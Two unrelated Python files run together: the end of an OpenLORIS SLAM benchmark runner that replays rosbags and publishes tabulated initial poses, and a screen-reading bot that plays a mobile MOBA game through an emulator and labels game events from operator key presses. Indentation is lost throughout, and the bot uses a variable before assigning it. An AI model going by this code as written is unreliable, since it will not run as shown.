seq = 1
DEVNULL = open(os.devnull, 'r+b', 0)
global pose_count, current_pose
for bag in bags:
if seq != 1:
if aided_reloc:
init_pose = PoseStamped()
#p = get_init_pose(scene, seq, frame)
p = openloris_init_poses[frame][scene][seq]
init_pose.header.seq = seq
init_pose.header.frame_id = frame
init_pose.pose.position.x = p[0]
init_pose.pose.position.y = p[1]
init_pose.pose.position.z = p[2]
init_pose.pose.orientation.x = p[3]
init_pose.pose.orientation.y = p[4]
init_pose.pose.orientation.z = p[5]
init_pose.pose.orientation.w = p[6]
pub_pose.publish(init_pose)
logger.info('Published initial pose for the next sequence on %s' % (init_pose_topic))
time.sleep(1)
print("seq: %d" % seq)
print("aided_reloc: false")
logger.info('Playing %s ...' % (bag))
pose_count = 0
current_pose = None
process = subprocess.Popen(['rosbag', 'play', bag, '--topics'] + topics, stdin=DEVNULL, stdout=DEVNULL)
previous_pose = None
previous_count = 0
while process.poll() == None:
if current_pose is not None and current_pose != previous_pose:
logger.info('Received poses in %d FPS. Current: (%s)' % (pose_count - previous_count, ', '.join('%.4f' % v for v in current_pose)))
previous_pose = current_pose
previous_count = pose_count
time.sleep(1)
time.sleep(1)
logger.info('Got %d poses for %s' % (pose_count, bag.split('/')[-1]))
seq += 1
def publish_msg(msg, pose):
pub_n = rospy.Publisher('new_sequence', UInt8, queue_size=10)
pub_p = rospy.Publisher('/openloris/reset_pose', PoseStamped, queue_size=10)
rate = rospy.Rate(10)
time = rospy.get_rostime().to_sec() + 1
while True:
new_time = rospy.get_rostime().to_sec()
if new_time > time:
return
pub_n.publish(msg)
rate.sleep()
pub_p.publish(pose)
def cpu_info():
CPUinfo=OrderedDict()
procinfo=OrderedDict()
nprocs = 0
with open('/proc/cpuinfo') as f:
for line in f:
if not line.strip():
#end of one processor
CPUinfo['proc%s' % nprocs]=procinfo
nprocs = nprocs+1
#Reset
procinfo=OrderedDict()
else:
if len(line.split(':')) == 2:
procinfo[line.split(':')[0].strip()] = line.split(':')[1].strip()
else:
procinfo[line.split(':')[0].strip()] = ''
return CPUinfo
def complete_topics(topics):
out = []
for topic in topics:
topic = topic.strip()
if not topic.startswith('/'):
topic = '/' + topic
topic = topic.rstrip('/')
if topic.endswith('color') or topic.endswith('depth') or topic.endswith('fisheye1') or topic.endswith('fisheye2'):
out.append(topic + '/image_raw')
out.append(topic + '/camera_info')
elif topic.endswith('accel') or topic.endswith('gyro'):
out.append(topic + '/sample')
out.append(topic + '/imu_info')
else:
out.append(topic)
return out
def generate_info(algorithm, topics, target_frame, use_gpu):
info = ''
info += 'algorithm: %s\n' % algorithm
info += 'topics: %s\n' % ','.join(topics)
info += 'frame: %s\n' % target_frame
for processor in cpu_info().keys():
cpu_model = cpu_info()[processor]['model name']
info += 'CPU: %s\n' % (cpu_model)
if use_gpu:
try:
import pynvml
has_pynvml = True
except ModuleNotFoundError:
print("Install pynvml to get GPU info")
has_pynvml = False
if has_pynvml:
info += 'GPU:'
pynvml.nvmlInit()
deviceCount = pynvml.nvmlDeviceGetCount()
for i in range(deviceCount):
handle = pynvml.nvmlDeviceGetHandleByIndex(i)
gpu = pynvml.nvmlDeviceGetName(handle)
info += ' ' + gpu.decode('utf-8')
info += '\n'
else:
info += 'GPU: unable to detect; please install pynvml\n'
mem_g = psutil.virtual_memory().total/1024/1024/1024
info += "memory: %d GB\n" % mem_g
return info
def get_bag_list(path, scene, sequences):
bags = []
for seq in range(1, sequences + 1):
results = glob.glob(r'%s/%s-1-%d*.bag' % (path, scene, seq))
if len(results) < 1: sys.exit('Cannot find %s-1-%d*.bag in %s' % (scene, seq, path))
bags.append(results[0])
return bags
def main():
'''
Main function of this script.
'''
#logger.info('Please check the above testing configurations. Correct? [Y/n]')
#raw_input()
# Parse config
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--config', type=str, default='test.yaml', help='config file')
args = parser.parse_args()
config_file = args.config
logger.info('config: %s', config_file)
config = None
with open(config_file) as cfile:
config = yaml.load(cfile)
if config is None:
sys.exit('Could not open the configuration file %s' % config_file)
#print(config)
topics = complete_topics(config['input_topics'])
rate = config['rate'] if 'rate' in config else 1
tests = []
for test in config['tests']:
if test['enable']:
test['bags'] = get_bag_list(test['path'], test['scene'], test['sequences'])
tests.append(test)
pub_pose = rospy.Publisher(init_pose_topic, PoseStamped, queue_size=10)
# Confirm config
if config['frame'] not in valid_frames:
logger.error('Invalid frame %s' % config['frame'])
logger.error('Valid frames are: %s', ', '.join(valid_frames))
sys.exit()
info = generate_info(config['algorithm'], config['input_topics'], config['frame'], config['use_gpu'])
logger.info('---------------------------------------------')
logger.info(info)
#for item in ['algorithm', 'pose_topic', 'frame', 'aided_reloc', 'use_gpu', 'input_topics']:
# logger.info('%s: %s' % (item, str(configs[item])))
for test in tests:
logger.info('--\nscene: %s' % test['scene'])
logger.info(' ' + '\n '.join(test['bags']))
logger.info('---------------------------------------------')
key = raw_input('Please check the above testing configurations. Correct? [Y/n]')
if key not in ['', 'y', 'Y']:
logger.info('Please correct the configurations in %s' % config_file)
sys.exit()
# Prepare for testing
rospy.init_node('openloris_test', anonymous=True)
t_listener = threading.Thread(target=handle_listener, args=(config['pose_topic'],))
t_listener.setDaemon(True)
t_listener.start()
outfolder = 'openloris_results_%s' % config['algorithm']
if not os.path.exists(outfolder):
os.mkdir(outfolder)
signal.signal(signal.SIGINT, sigint_handler)
# Test
for test in tests:
scene = test['scene']
logger.info('---------------------------------------------')
logger.info('Test: %s (%d sequences)' % (scene, test['sequences']))
logger.info('Please %s your algorithm, make sure it has subscribed the right topics, and will publish poses (PoseStamped) on %s' \
% ('get ready' if tests.index(test) == 0 else 'restart/reset', config['pose_topic']))
logger.info('Once ready, you are not allowed to provide any manual input to your algorithm. <Press Enter to start>')
raw_input()
outfilename = outfolder + ('/%s-1.txt' % scene)
sys.stdout = open(outfilename, mode='w')
print('scene: %s' % scene)
print(info)
# try:
play_sequences(test['bags'], topics, config['aided_reloc'], scene, config['frame'], pub_pose)
sys.stdout.close()
logger.info('Results has been saved to %s' % outfilename)
# except Exception as e:
# logger.error(e)
# sys.exit(-1)
openloris_init_poses = {
"d400_color": {
"home": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (2.048979,-0.002665,4.537484,-0.009075,-0.562620,0.003767,0.826657),
3: (-0.768389,0.061032,7.263491,-0.010878,-0.674418,0.004516,0.738255),
4: (-2.449708,0.068256,4.292432,0.007224,0.447841,-0.002999,0.894079),
5: (0.920740,-0.006231,1.287274,0.012846,0.796441,-0.005333,0.604556),
},
"market": {
1: (-0.000000,0.000000,0.000000,0.000000,-0.000000,-0.000000,1.000000),
2: (1.305539,-2.203308,15.508237,-0.000171,0.059580,0.008479,0.998187),
3: (1.082180,-2.558096,17.996719,0.000065,-0.022770,-0.003241,0.999735),
},
"cafe": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (-0.580684,0.010388,0.152612,-0.002699,-0.167305,0.001120,0.985901),
},
"corridor": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (-36.176285,0.646324,9.377665,-0.001365,-0.084694,0.000567,0.996406),
3: (-36.552540,0.654303,9.662947,-0.001386,-0.085934,0.000575,0.996300),
4: (-46.958865,0.900254,21.325972,0.012293,0.762042,-0.005103,0.647391),
5: (-36.054248,0.629627,7.177968,-0.001892,-0.117289,0.000785,0.993096),
},
"office": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (-3.442015,0.003196,0.338312,-0.005375,0.120520,0.000077,0.992696),
3: (-3.694180,-0.012357,-0.251014,-0.001239,0.999841,-0.017416,0.003740),
4: (-3.552656,-0.004217,-0.019779,-0.001152,0.989872,-0.015916,0.141061),
5: (-3.530060,0.012260,0.878919,0.003576,0.033667,0.000285,0.999427),
6: (0.011558,-0.000277,-0.099034,-0.004520,0.024910,-0.000547,0.999679),
7: (-3.505344,0.010941,0.707510,-0.008124,0.198803,0.000582,0.980006),
},
},
"d400_depth": {
"home": {
1: (0.000000,0.000000,0.000000,-0.000000,0.000000,0.000000,1.000000),
2: (2.012263,0.021269,4.562794,-0.006943,-0.562634,0.005684,0.826657),
3: (-0.825435,0.083665,7.272808,-0.008322,-0.674436,0.006814,0.738255),
4: (-2.480525,0.073705,4.265565,0.005526,0.447852,-0.004525,0.894079),
5: (0.894962,0.001863,1.277470,0.009828,0.796461,-0.008047,0.604556),
},
"market": {
1: (-0.000000,0.000000,-0.000000,-0.000000,0.000000,-0.000000,1.000000),
2: (1.179254,-2.180837,15.519733,-0.000560,0.059587,0.008416,0.998187),
3: (0.935694,-2.534688,18.008920,0.000214,-0.022773,-0.003216,0.999735),
},
"cafe": {
1: (0.000000,0.000000,0.000000,-0.000000,0.000000,0.000000,1.000000),
2: (-0.582661,0.008746,0.154042,-0.002065,-0.167310,0.001690,0.985901),
},
"corridor": {
1: (0.000000,0.000000,0.000000,-0.000000,0.000000,0.000000,1.000000),
2: (-36.233228,0.539726,9.165883,-0.001044,-0.084696,0.000856,0.996406),
3: (-36.611187,0.547249,9.448964,-0.001060,-0.085936,0.000868,0.996300),
4: (-47.102917,0.793742,21.031925,0.009405,0.762061,-0.007699,0.647391),
5: (-36.098462,0.515858,6.967956,-0.001447,-0.117292,0.001185,0.993096),
},
"office": {
1: (0.000000,0.000000,0.000000,-0.000000,0.000000,0.000000,1.000000),
2: (-3.444198,-0.008900,0.314562,-0.005836,0.120498,-0.000376,0.992696),
3: (-3.722319,-0.027628,-0.274054,-0.004965,0.999762,-0.020924,0.003740),
4: (-3.581410,-0.018210,-0.046041,-0.004849,0.989799,-0.019389,0.141061),
5: (-3.535166,0.001734,0.857186,0.003445,0.033682,0.000188,0.999427),
6: (0.012155,-0.000593,-0.099704,-0.004612,0.024890,-0.000660,0.999679),
7: (-3.510364,-0.000136,0.681082,-0.008888,0.198771,-0.000162,0.980006),
},
},
"d400_imu": {
"home": {
1: (0.000000,-0.000000,0.000000,-0.000000,0.000000,0.000000,1.000000),
2: (2.019698,0.021305,4.575453,-0.006943,-0.562634,0.005684,0.826657),
3: (-0.818771,0.083748,7.289096,-0.008322,-0.674436,0.006814,0.738255),
4: (-2.492207,0.073852,4.265824,0.005526,0.447852,-0.004525,0.894079),
5: (0.876524,0.002188,1.287055,0.009828,0.796461,-0.008047,0.604556),
},
"market": {
1: (0.000000,-0.000000,0.000000,0.000000,-0.000000,-0.000000,1.000000),
2: (1.178006,-2.212088,15.514719,-0.000561,0.059570,0.008536,0.998187),
3: (0.936309,-2.571069,18.004021,0.000214,-0.022766,-0.003262,0.999735),
},
"cafe": {
1: (0.000000,-0.000000,0.000000,-0.000000,0.000000,0.000000,1.000000),
2: (-0.579084,0.008727,0.156544,-0.002065,-0.167310,0.001690,0.985901),
},
"corridor": {
1: (0.000000,-0.000000,0.000000,-0.000000,0.000000,0.000000,1.000000),
2: (-36.231318,0.539714,9.166994,-0.001044,-0.084696,0.000856,0.996406),
3: (-36.609250,0.547237,9.450094,-0.001060,-0.085936,0.000868,0.996300),
4: (-47.121035,0.794048,21.040113,0.009405,0.762061,-0.007699,0.647391),
5: (-36.095869,0.515842,6.969581,-0.001447,-0.117292,0.001185,0.993096),
},
"office": {
1: (0.000000,-0.000000,0.000000,-0.000000,0.000000,0.000000,1.000000),
2: (-3.447164,-0.009047,0.313643,-0.005836,0.120498,-0.000376,0.992696),
3: (-3.733398,-0.027188,-0.250411,-0.004965,0.999762,-0.020924,0.003740),
4: (-3.595489,-0.017855,-0.024375,-0.004849,0.989799,-0.019389,0.141061),
5: (-3.535968,0.001818,0.856806,0.003445,0.033682,0.000188,0.999427),
6: (0.011558,-0.000710,-0.099917,-0.004612,0.024890,-0.000660,0.999679),
7: (-3.515357,-0.000360,0.679951,-0.008888,0.198771,-0.000162,0.980006),
},
},
"t265_fisheye1": {
"home": {
1: (0.000000,0.000000,0.000000,-0.000000,0.000000,-0.000000,1.000000),
2: (2.053283,0.018268,4.515752,-0.009045,-0.562597,0.006389,0.826657),
3: (-0.757234,0.094409,7.241848,-0.010842,-0.674391,0.007658,0.738255),
4: (-2.429192,0.087896,4.301167,0.007200,0.447822,-0.005085,0.894079),
5: (0.949122,-0.000684,1.283464,0.012804,0.796409,-0.009044,0.604556),
},
"market": {
1: (-0.000000,0.000000,0.000000,-0.000000,0.000000,-0.000000,1.000000),
2: (-0.381144,5.625077,14.669697,-0.000916,0.056177,-0.021565,0.998187),
3: (-0.960520,6.503088,16.981551,0.000350,-0.021470,0.008242,0.999735),
},
"cafe": {
1: (0.000000,0.000000,0.000000,-0.000000,0.000000,-0.000000,1.000000),
2: (-0.583466,0.011070,0.148770,-0.002690,-0.167299,0.001900,0.985901),
},
"corridor": {
1: (0.000000,0.000000,0.000000,-0.000000,0.000000,-0.000000,1.000000),
2: (-36.163584,0.688469,9.427901,-0.001361,-0.084691,0.000962,0.996406),
3: (-36.539423,0.697756,9.713686,-0.001381,-0.085930,0.000976,0.996300),
4: (-46.900735,0.996956,21.392776,0.012252,0.762010,-0.008653,0.647391),
5: (-36.045484,0.661581,7.227184,-0.001886,-0.117284,0.001332,0.993096),
},
"office": {
1: (0.000000,0.000000,0.000000,-0.000000,0.000000,-0.000000,1.000000),
2: (-3.438522,0.004781,0.345892,-0.005380,0.120518,-0.000473,0.992696),
3: (-3.670629,-0.014126,-0.268092,-0.001309,0.999749,-0.022047,0.003740),
4: (-3.526115,-0.004800,-0.033364,-0.001220,0.989788,-0.020501,0.141061),
5: (-3.527940,0.016120,0.885206,0.003575,0.033668,0.000124,0.999427),
6: (0.011991,-0.000619,-0.098661,-0.004522,0.024907,-0.000655,0.999679),
7: (-3.499082,0.014310,0.716282,-0.008131,0.198803,-0.000327,0.980006),
},
},
"t265_fisheye2": {
"home": {
1: (0.000000,0.000000,0.000000,-0.000000,-0.000000,-0.000000,1.000000),
2: (1.981370,0.030678,4.589291,-0.010840,-0.562538,0.008440,0.826657),
3: (-0.865461,0.126201,7.299640,-0.012994,-0.674320,0.010118,0.738255),
4: (-2.484349,0.111377,4.232548,0.008628,0.447776,-0.006718,0.894079),
5: (0.859061,0.001877,1.228348,0.015345,0.796325,-0.011948,0.604556),
},
"market": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,-0.000000,1.000000),
2: (-0.472924,5.676977,14.638771,-0.000760,0.056097,-0.021779,0.998187),
3: (-1.066326,6.567627,16.953535,0.000290,-0.021439,0.008324,0.999735),
},
"cafe": {
1: (0.000000,0.000000,0.000000,-0.000000,-0.000000,-0.000000,1.000000),
2: (-0.588044,0.013818,0.165764,-0.003223,-0.167281,0.002510,0.985901),
},
"corridor": {
1: (0.000000,0.000000,0.000000,-0.000000,-0.000000,-0.000000,1.000000),
2: (-36.226805,0.835882,9.184199,-0.001631,-0.084682,0.001271,0.996406),
3: (-36.604617,0.847412,9.467483,-0.001656,-0.085921,0.001289,0.996300),
4: (-47.119124,1.223038,20.998848,0.014683,0.761931,-0.011432,0.647391),
5: (-36.094352,0.800388,6.988578,-0.002260,-0.117272,0.001760,0.993096),
},
"office": {
1: (0.000000,0.000000,0.000000,-0.000000,-0.000000,-0.000000,1.000000),
2: (-3.442659,0.016500,0.306628,-0.005001,0.120532,-0.000964,0.992696),
3: (-3.796658,-0.003576,-0.294144,0.001956,0.999658,-0.025813,0.003740),
4: (-3.651193,0.005770,-0.075837,0.002003,0.989702,-0.024230,0.141061),
5: (-3.534078,0.030372,0.856267,0.003678,0.033657,0.000022,0.999427),
6: (0.012596,-0.001142,-0.101759,-0.004440,0.024918,-0.000780,0.999679),
7: (-3.508952,0.027483,0.666926,-0.007510,0.198825,-0.001131,0.980006),
},
},
"t265_imu": {
"home": {
1: (0.000000,0.000000,0.000000,0.000000,-0.000000,-0.000000,1.000000),
2: (-1.996198,0.003803,4.548154,0.011874,0.562561,0.004741,0.826657),
3: (0.846974,-0.078926,7.243782,0.014233,0.674347,0.005683,0.738255),
4: (2.480536,-0.088306,4.265572,-0.009452,-0.447793,-0.003774,0.894079),
5: (-0.921339,0.008630,1.283449,-0.016809,-0.796357,-0.006712,0.604556),
},
"market": {
1: (0.000000,-0.000000,0.000000,0.000000,0.000000,-0.000000,1.000000),
2: (0.516480,-5.586881,14.678775,0.000401,-0.056239,-0.021419,0.998187),
3: (1.117126,-6.462140,16.988129,-0.000153,0.021493,0.008186,0.999735),
},
"cafe": {
1: (0.000000,0.000000,0.000000,0.000000,-0.000000,-0.000000,1.000000),
2: (0.585658,-0.013591,0.145843,0.003531,0.167288,0.001410,0.985901),
},
"corridor": {
1: (0.000000,0.000000,0.000000,0.000000,-0.000000,-0.000000,1.000000),
2: (36.262398,-0.841508,9.029932,0.001786,0.084685,0.000714,0.996406),
3: (36.641342,-0.851879,9.311582,0.001814,0.085925,0.000724,0.996300),
4: (47.142230,-1.170879,20.863299,-0.016084,-0.761961,-0.006422,0.647391),
5: (36.120152,-0.819977,6.831279,0.002475,0.117277,0.000988,0.993096),
},
"office": {
1: (0.000000,0.000000,0.000000,0.000000,-0.000000,-0.000000,1.000000),
2: (3.442369,-0.020799,0.305186,0.004783,-0.120544,-0.000201,0.992696),
3: (3.688849,-0.004784,-0.309137,0.003839,0.999799,0.019311,-0.003740),
4: (3.546448,-0.012713,-0.075700,0.003862,0.989833,0.017793,-0.141061),
5: (3.537446,-0.031149,0.845348,-0.003738,-0.033650,0.000256,0.999427),
6: (-0.013075,0.000427,-0.099056,0.004392,-0.024931,-0.000637,0.999679),
7: (3.507507,-0.029618,0.673291,0.007152,-0.198841,0.000130,0.980006),
},
},
"base_link": {
"home": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (4.653439,-2.246949,0.000000,0.000000,0.000000,0.562706,0.826657),
3: (7.410862,0.568846,0.000000,0.000000,0.000000,0.674521,0.738255),
4: (4.399963,2.653627,0.000000,0.000000,0.000000,-0.447909,0.894079),
5: (1.633000,-0.754733,0.000000,0.000000,0.000000,-0.796563,0.604556),
},
"market": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (15.713963,-0.293285,0.000000,0.000000,0.000000,-0.060181,0.998187),
3: (18.211526,0.017624,0.000000,0.000000,0.000000,0.023000,0.999735),
},
"cafe": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (0.142683,0.504664,0.000000,0.000000,0.000000,0.167331,0.985901),
},
"corridor": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (9.014827,36.233859,-0.000016,0.000000,-0.000001,0.084707,0.996406),
3: (9.296355,36.612415,-0.000015,0.000000,0.000000,0.085947,0.996300),
4: (21.175313,47.339619,-0.000017,-0.000000,-0.000001,-0.762158,0.647391),
5: (6.816094,36.074646,-0.000017,0.000000,0.000000,0.117307,0.993096),
},
"office": {
1: (0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000),
2: (0.309635,3.500538,0.058010,0.000811,0.007326,-0.120414,0.992696),
3: (0.145258,3.621898,0.064342,0.010893,-0.017257,0.999785,-0.003740),
4: (0.381370,3.543278,0.057061,0.009458,-0.017024,0.989809,-0.141061),
5: (0.853251,3.554253,0.049278,0.000541,-0.003027,-0.033718,0.999427),
6: (-0.105108,-0.001915,0.001637,-0.000429,0.004917,-0.024837,0.999679),
7: (0.690678,3.603368,0.055720,0.001800,0.011347,-0.198638,0.980006),
},
},
}
if __name__ == "__main__":
main()
sys.exit(0)
|
state_anno.py
|
import socket
import json
import sys
import time
import threading
import cv2
import torch
import numpy as np
from utils import combine_states
import torchvision
from resnet_utils import myResnet
from Model_strategy import Agent
from Batch import create_masks
import subprocess
from PyQt5.QtWidgets import QApplication
from PIL import Image, ImageQt
import os
import win32gui
import win32ui
import win32con
from utils import read_json
from utils import MyMNTDevice, 取图
from pynput.keyboard import Key, Listener
from pynput import keyboard
import random
from Model_strategy import Transformer
#window = int(subprocess.check_output(["xdotool", "search" ,"VehiclePhysicsExampleeeveed181"]).decode('ascii').split('\n')[0])
# _DEVICE_ID = '68UDU17B14011947'
_DEVICE_ID = '127.0.0.1:7555' # mumu
# window = "RNE-AL00"
window = "R11"
window = win32gui.FindWindow(0, window)
device = torch.device("cuda:0" if (torch.cuda.is_available()) else "cpu")
mod = torchvision.models.resnet101(pretrained=True).eval().cuda(device).requires_grad_(False)
resnet101 = myResnet(mod)
model_judge_state = Transformer(6, 768, 2, 12, 0.0, 6*6*2048)
model_judge_state.load_state_dict(torch.load('weights/model_weights_判断状态L'))
model_judge_state.cuda(device)
N = 15000 # 运行N次后学习
parallel = 100
episode = 3
lr = 0.0003
agent = Agent(act_num=7, parallel_num=parallel,
lr=lr, episode=episode,
input_size=6)
feedback_flag = True
total = 0
tmp_score = 0
tmp_score2 = 0
step = 0
learn_num = 0
allscores = []
allspeeds = []
bestscore = 0
time.sleep(1)
app = QApplication(sys.argv)
screen = app.primaryScreen()
# data_save_dir = '../training_data2'
time_start = 0
add_third_skill = 'd 0 559 1767 100\nc\nu 0\nc\n'
add_sec_skill = 'd 0 443 1562 100\nc\nu 0\nc\n'
add_fst_skill = 'd 0 246 1448 100\nc\nu 0\nc\n'
buy = 'd 0 636 190 100\nc\nu 0\nc\n'
# ope_com_dir="./json/ope_command.json"
# 词数词典路径 = "./json/词_数表.json"
# 数_词表路径 = "./json/数_词表.json"
# 操作查询路径 = "./json/名称_操作.json"
ope_dict = {"img_idx": "0", "move_ope": "无移动", "act_ope": "无动作"}
# if os.path.isfile(词数词典路径) and os.path.isfile(数_词表路径):
# comb_idx, idx_comb = read_json(词数词典路径, 数_词表路径)
# with open(词数词典路径, encoding='utf8') as f:
# 词数词典 = json.load(f)
# with open(操作查询路径, encoding='utf8') as f:
# ope_command_dict = json.load(f)
comb_idx_dir = "./json/comb_idx.json"
idx_comb_dir = "./json/idx_comb.json"
ope_com_dir = "./json/ope_command.json"
comb_idx = read_json(comb_idx_dir)
idx_comb = read_json(idx_comb_dir)
ope_command_dict = read_json(ope_com_dir)
direct_sheet = ['上移', '下移', '左移', '右移', '左上移', '左下移', '右上移', '右下移']
simulator = MyMNTDevice(_DEVICE_ID)
old_command = '移动停'
press1 = False
press2 = False
press3 = False
press4 = False
press5 = False
press6 = False
press7 = False
press8 = False
contflag = True
# 需要用一个东西来装关键事件
# 需要储存事件以及对应的图片
state_dict = {'击杀小兵或野怪或推掉塔': 1, '击杀敌方英雄': 5, '被击塔攻击': -2, '被击杀': -5, '无状况': 0, '死亡': 0, '其它': -0.03, '普通': 0}
# state_dict_A = {'击杀小兵或野怪或推掉塔': 0, '击杀敌方英雄': 1, '被击塔攻击': 2, '被击杀': 3, '无状况': 4, '死亡': 5, '其它': 6, '普通': 7}
state_dict_B = {'击杀小兵或野怪或推掉塔': 0, '击杀敌方英雄': 1, '被击塔攻击': 2, '被击杀': 3, '死亡': 4, '普通': 5}
state = '无状况'
state_list = []
for K in state_dict_B:
state_list.append(K)
def get_key_name(key):
if isinstance(key, keyboard.KeyCode):
return key.char
else:
return str(key)
def on_release(key):
global press1, state
key_name = get_key_name(key)
if key_name == '1':
press1 = False
if key_name == '2':
press2 = False
if key_name == '3':
press3 = False
if key_name == '4':
press4 = False
if key_name == '5':
press5 = False
if key_name == '6':
press6 = False
if key_name == '7':
press7 = False
if key_name == '8':
press8 = False
if key_name == 'Key.page_down':
state = '无状况'
print("已经释放:", key_name)
if key == Key.esc:
# 停止监听
return False
def on_press(key):
global press1, state, contflag
key_name = get_key_name(key)
操作 = ''
if key_name == 'Key.left':
state = '击杀小兵或野怪或推掉塔'
if key_name == 'Key.down':
state = '击杀敌方英雄'
if key_name == 'Key.right':
state = '被击塔攻击'
if key_name == 'Key.up':
state = '被击杀'
if key_name == 'Key.page_down':
state = '其它'
if key_name == 'q':
state = '普通'
if key_name == 'e':
state = '死亡'
if key_name == 'i':
contflag = bool(1 - contflag)
print(state)
def start_listen():
with Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
th = threading.Thread(target=start_listen,)
th.start()
judge_data_dir = '../判断数据样本test'
if not os.path.exists(judge_data_dir):
os.makedirs(judge_data_dir)
imgs_dir = judge_data_dir+'/'
if not os.path.exists(imgs_dir):
os.mkdir(imgs_dir)
for i in range(6666666):
img_tensor = torch.Tensor(0)
ope_seq = np.ones((1, 1))
ope_seq[0] = 128
count = 0
while contflag:
time_start = time.time()
img = screen.grabWindow(window)
image = ImageQt.fromqimage(img)
img_resize = image.resize((960, 480))
#imgA = 取图(窗口名称)
img_array = np.asarray(img_resize)
tmp_tensor = torch.tensor(img_array, device=device)
capture = tmp_tensor.unsqueeze(0).permute(0, 3, 2, 1) / 255
_, out = resnet101(capture)
out = torch.reshape(out, (1, 6*6*2048))
ope_seqA = np.ones((1, 1))
ope_tensorA = torch.tensor(ope_seqA.astype(np.int64)).cuda(device)
src_mask, trg_mask = create_masks(ope_tensorA.unsqueeze(0), ope_tensorA.unsqueeze(0), device)
outA = out.detach()
real_output, _ = model_judge_state(outA.unsqueeze(0), ope_tensorA.unsqueeze(0), trg_mask)
#实际输出=model_判断状态(out, 操作张量.unsqueeze(0),trg_mask)
_, sample = torch.topk(real_output, k=1, dim=-1)
sample_np = sample.cpu().numpy()
if img_tensor.shape[0] == 0:
img_tensor = out
elif img_tensor.shape[0] < 120:
img_tensor = torch.cat((img_tensor, out), 0)
ope_seq = np.append(ope_seq, action)
else:
img_tensor = img_tensor[0:119, :]
ope_seq = ope_seq[0:119]
ope_seq = np.append(ope_seq, action)
img_tensor = torch.cat((img_tensor, out), 0)
ope_seqB = torch.tensor(ope_seq.astype(np.int64)).cuda(device)
# ope_seqB = ope_seq.astype(np.)
# src_mask, trg_mask = create_masks(ope_seq.unsqueeze(0), ope_seq.unsqueeze(0), device)
src_mask, trg_mask = create_masks(ope_seqB.unsqueeze(0), ope_seqB.unsqueeze(0), device)
cur_state = combine_states(img_tensor.cpu().numpy(), ope_seq, trg_mask)
end = False
episode_count = 0
action, action_prob, critic = agent.select_action(cur_state, device, 0)
# 周期性加一二三技能,并且停止移动
if count % 50 == 0 and count != 0:
simulator.发送(buy)
simulator.发送(add_third_skill)
simulator.发送(add_sec_skill)
simulator.发送(add_fst_skill)
simulator.发送(ope_command_dict['移动停'])
print(old_command, '周期')
time.sleep(0.02)
simulator.发送(ope_command_dict[old_command])
# 读取action 发送到设备
command = idx_comb[str(action)]
command_set = command.split('_')
if command_set[0] == '无移动':
command_set[0] = '移动停'
if command_set[0] == old_command:
ope_dict['move_ope'] = command_set[0]
ope_dict['act_ope'] = command_set[1]
else:
ope_dict['move_ope'] = command_set[0]
ope_dict['act_ope'] = command_set[1]
old_command = command_set[0]
simulator.发送(ope_command_dict[command_set[0]])
time.sleep(0.01)
if command_set[1] != '无动作' and command_set[1] != '发起集合' and command_set[1] != '发起进攻' and command_set[1] != '发起撤退':
simulator.发送(ope_command_dict[command_set[1]])
#状态辞典={'击杀小兵或野怪或推掉塔': 1, '击杀敌方英雄': 5, '被击塔攻击': -2, '被击杀': -5,'无状况': 0, '死亡': 0, '其它': -0.03,'普通': 0}
if state == '其它' or state == '无状况':
state = state_list[sample_np[0, 0, 0, 0]]
score = state_dict[state]
# or 状况 == '被击塔攻击' or 状况 == '被击杀'
#print(状况, '得分', 得分)
# {'击杀小兵或野怪或推掉塔': 0, '击杀敌方英雄': 1, '被击塔攻击': 2, '被击杀': 3, '死亡': 4, '普通': 5}
if state == '击杀小兵或野怪或推掉塔' or state == '击杀敌方英雄' or state == '被击塔攻击' or state == '被击杀':
print(state, '得分', score)
# 写入json
if state == '击杀小兵或野怪或推掉塔' or state == '击杀敌方英雄':
event_time = str(int(time.time()*100))
img_resize.save(imgs_dir + event_time+'.jpg')
event_dict = {}
event_dict[event_time] = state
rec_file = open(imgs_dir + '_判断数据.json', 'a+')
json.dump(event_dict, rec_file, ensure_ascii=False)
rec_file.write('\n')
rec_file.close()
elif state == '普通':
if random.randint(0, 5000) % 100000 == 0: #TODO: 概率很小 只有random的结果为0时
print(state, '得分', score)
event_time = str(int(time.time()*100))
img_resize.save(imgs_dir+ event_time+'.jpg')
event_dict = {}
event_dict[event_time] = state
rec_file = open(imgs_dir + '_判断数据.json', 'a+')
json.dump(event_dict, rec_file, ensure_ascii=False)
rec_file.write('\n')
rec_file.close()
elif state == '死亡':
if random.randint(0, 5000) % 50000 == 0: #TODO: 概率很小 只有random的结果为0时
print(state, '得分', score)
event_time = str(int(time.time()*100))
img_resize.save(imgs_dir+event_time+'.jpg')
event_dict = {}
event_dict[event_time] = state
rec_file = open(imgs_dir + '_判断数据.json', 'a+')
json.dump(event_dict, rec_file, ensure_ascii=False)
rec_file.write('\n')
rec_file.close()
if state != '其它':
state = '无状况'
else:
print('其它得分', score)
cur_state['img_tensor'] = cur_state['img_tensor'][:, -1:, :]
cur_state['ope_seq'] = cur_state['ope_seq'][-1:]
cur_state['trg_mask'] = 0
#智能体.记录数据(状态, 动作, 动作可能性, 评价, 得分, 完结,计数)
time_cost = 0.22 - (time.time() - time_start)
if time_cost > 0:
time.sleep(time_cost)
count = count + 1
if count % 10 == 0:
print('time cost = {}'.format(time_cost))
if contflag is False:
print('learning.............')
# 智能体.学习(device)
print('score', 1)
# 智能体.保存模型(学习次数)
allscores = []
allspeeds = []
print('learning done')
# 智能体.存硬盘('PPO训练数据/'+str(int(time.time())))
# 智能体.保存模型(学习次数)
time.sleep(1)
print('继续', contflag)
# 状态=状态_
# 延迟 = 0.22 - (time.time() - 计时开始)
# if 延迟 > 0:
# time.sleep(延迟)
# 局内计数 = 局内计数 + 1
#
# 分数记录.append(分数)
#
# 平均分 = np.mean(分数记录[-500:])
